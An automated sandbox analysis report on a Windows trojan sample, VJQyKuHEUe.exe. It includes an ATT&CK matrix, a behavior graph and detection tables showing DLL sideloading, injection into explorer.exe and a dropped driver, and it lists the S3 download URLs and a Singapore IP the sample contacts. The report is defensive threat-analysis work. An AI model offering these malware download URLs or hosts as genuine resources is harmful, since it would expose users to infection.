Security Account Manager3
File and Directory Discovery
SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron1
Registry Run Keys / Startup Folder
412
Process Injection
2
Obfuscated Files or Information
NTDS26
System Information Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
Scheduled Task/Job
1
Software Packing
LSA Secrets1
Query Registry
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
Registry Run Keys / Startup Folder
1
Timestomp
Cached Domain Credentials351
Security Software Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading
DCSync151
Virtualization/Sandbox Evasion
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
Masquerading
Proc Filesystem3
Process Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Modify Registry
/etc/passwd and /etc/shadow1
Application Window Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron151
Virtualization/Sandbox Evasion
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd412
Process Injection
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577406 Sample: VJQyKuHEUe.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 56 s3-r-w.ap-east-1.amazonaws.com 2->56 58 api.msn.com 2->58 60 anydesk17.s3.ap-east-1.amazonaws.com 2->60 70 Suricata IDS alerts for network traffic 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus detection for URL or domain 2->74 76 4 other signatures 2->76 9 VJQyKuHEUe.exe 15 13 2->9         started        13 explorer.exe 119 127 2->13         started        16 zfon.exe 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 64 s3-r-w.ap-east-1.amazonaws.com 3.5.237.31, 443, 49710, 49714 AMAZON-02US United States 9->64 66 3.5.238.183, 443, 49715, 49722 AMAZON-02US United States 9->66 68 2 other IPs or domains 9->68 48 C:\Users\user\...\vcruntime140_1.dll, PE32+ 9->48 dropped 50 C:\Users\user\...\libcef.raw, PE32+ 9->50 dropped 52 C:\Users\user\AppData\...\VJQyKuHEUe.exe.log, ASCII 9->52 dropped 54 3 other files (none is malicious) 9->54 dropped 20 zfon.exe 9->20         started        86 Query firmware table information (likely to detect VMs) 13->86 23 zfon.exe 13->23         started        25 zfon.exe 16->25         started        27 zfon.exe 18->27         started        29 zfon.exe 18->29         started        file6 signatures7 process8 signatures9 78 Detected unpacking (overwrites its own PE header) 20->78 80 Writes to foreign memory regions 20->80 82 Allocates memory in foreign processes 20->82 84 Modifies the context of a thread in another process (thread injection) 20->84 31 zfon.exe 1 2 20->31         started        34 hh.exe 3 1 20->34         started        38 zfon.exe 23->38         started        process10 dnsIp11 88 Injects code into the Windows Explorer (explorer.exe) 31->88 90 Writes to foreign memory regions 31->90 92 Allocates memory in foreign processes 31->92 94 Found direct / indirect Syscall (likely to bypass EDR) 31->94 40 WerFault.exe 19 16 31->40         started        42 WerFault.exe 16 31->42         started        44 explorer.exe 3 2 31->44 injected 62 27.50.63.8, 10443, 4433, 49794 BCPL-SGBGPNETGlobalASNSG Singapore 34->62 46 C:\ProgramData\kernelquick.sys, data 34->46 dropped 96 Sample is not signed and drops a device driver 34->96 98 Tries to detect sandboxes / dynamic malware analysis system (QueryWinSAT) 34->98 file12 signatures13 process14

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
VJQyKuHEUe.exe34%ReversingLabsByteCode-MSIL.Trojan.Zilla
VJQyKuHEUe.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\MSVCP140.dll0%ReversingLabs
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\VCRUNTIME140.dll0%ReversingLabs
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\libcef.raw24%ReversingLabsWin64.Trojan.DllHijack
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\vcruntime140_1.dll0%ReversingLabs
C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dlld0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/aut.pngd0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/aut.png100%Avira URL Cloudmalware
https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dll0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dlld0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dll0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exe0%Avira URL Cloudsafe
https://www.battle.net/shop/simplecheckout/navbar0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/view.png100%Avira URL Cloudmalware
https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dll0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/view.pngd0%Avira URL Cloudsafe
https://www.battle.net/shop/simplecheckout/error0%Avira URL Cloudsafe
https://www.battle.net/shop/simplecheckout/debug-harness0%Avira URL Cloudsafe
https://www.battle.net/shop/simplecheckout/error?error=0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dlld0%Avira URL Cloudsafe
http://s3-r-w.ap-east-1.amazonaws.comd0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dll100%Avira URL Cloudmalware
https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarh0%Avira URL Cloudsafe
https://word.office.comz0%Avira URL Cloudsafe
http://anydesk17.s3.ap-east-1.amazonaws.comd0%Avira URL Cloudsafe
https://www.battle.net/shop/simplecheckout/loading0%Avira URL Cloudsafe
https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dlld0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s3-r-w.ap-east-1.amazonaws.com
3.5.237.31
truefalse
    high
    anydesk17.s3.ap-east-1.amazonaws.com
    unknown
    unknownfalse
      high
      api.msn.com
      unknown
      unknownfalse
        high
        NameMaliciousAntivirus DetectionReputation
        https://anydesk17.s3.ap-east-1.amazonaws.com/aut.pngtrue
        • Avira URL Cloud: malware
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dllfalse
        • Avira URL Cloud: safe
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dllfalse
        • Avira URL Cloud: safe
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/view.pngtrue
        • Avira URL Cloud: malware
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dllfalse
        • Avira URL Cloud: safe
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/zfon.exefalse
        • Avira URL Cloud: safe
        unknown
        https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dllfalse
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://word.office.comonexplorer.exe, 0000000B.00000002.2589830986.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
          high
          https://powerpoint.office.comcemberexplorer.exe, 0000000B.00000002.2597298593.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2568860335.000000000C460000.00000004.00000001.00020000.00000000.sdmpfalse
            high
            https://www.battle.net/shop/simplecheckout/navbarzfon.exe, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://upx.sf.netAmcache.hve.10.drfalse
              high
              https://powerpoint.office.comexplorer.exe, 0000000E.00000003.2663848409.0000000008EC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2668179739.0000000008EC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656028707.0000000008ECC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2671733531.0000000008EC8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2658351434.0000000008ECC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681947926.0000000008ECA000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://excel.office.comexplorer.exe, 0000000B.00000000.2557975463.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://anydesk17.s3.ap-east-1.amazonaws.com/aut.pngdVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmptrue
                  • Avira URL Cloud: safe
                  unknown
                  http://schemas.microexplorer.exe, 0000000B.00000000.2556832450.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000000.2556911362.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000B.00000002.2587251608.0000000007DC0000.00000002.00000001.00040000.00000000.sdmpfalse
                    high
                    https://outlook.comexplorer.exe, 0000000B.00000000.2557975463.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2589830986.0000000009BB2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://anydesk17.s3.ap-east-1.amazonaws.com/VCRUNTIME140.dlldVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://anydesk17.s3.ap-east-1.amazonaws.com/MSVCP140.dlldVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://nydus.battle.net/Bnet/client/purchase/jsutilzfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpfalse
                        high
                        https://anydesk17.s3.ap-east-1.amazonaws.com/libcef.dlldVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://anydesk17.s3.ap-east-1.amazonaws.comVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002970000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.00000000029AC000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002964000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://anydesk17.s3.ap-east-1.amazonaws.com/view.pngdVJQyKuHEUe.exe, 00000000.00000002.2529667483.00000000029AC000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://s3-r-w.ap-east-1.amazonaws.comVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.battle.net/shop/simplecheckout/error?error=zfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://www.battle.net/shop/simplecheckout/errorzfon.exe, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://android.notify.windows.com/iOSexplorer.exe, 0000000B.00000000.2553828308.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2585817290.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2737490360.000000000C072000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2749284190.000000000C072000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4608114951.000000000C068000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2726021307.000000000C071000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000E.00000003.2749284190.000000000C187000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2726021307.000000000C187000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2737490360.000000000C187000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4608114951.000000000C178000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://word.office.comzexplorer.exe, 0000000E.00000003.2662236331.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DC3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DC3000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://nydus.battle.net/Pro/zfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpfalse
                                high
                                https://www.battle.net/shop/simplecheckout/debug-harnesszfon.exe, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarhzfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
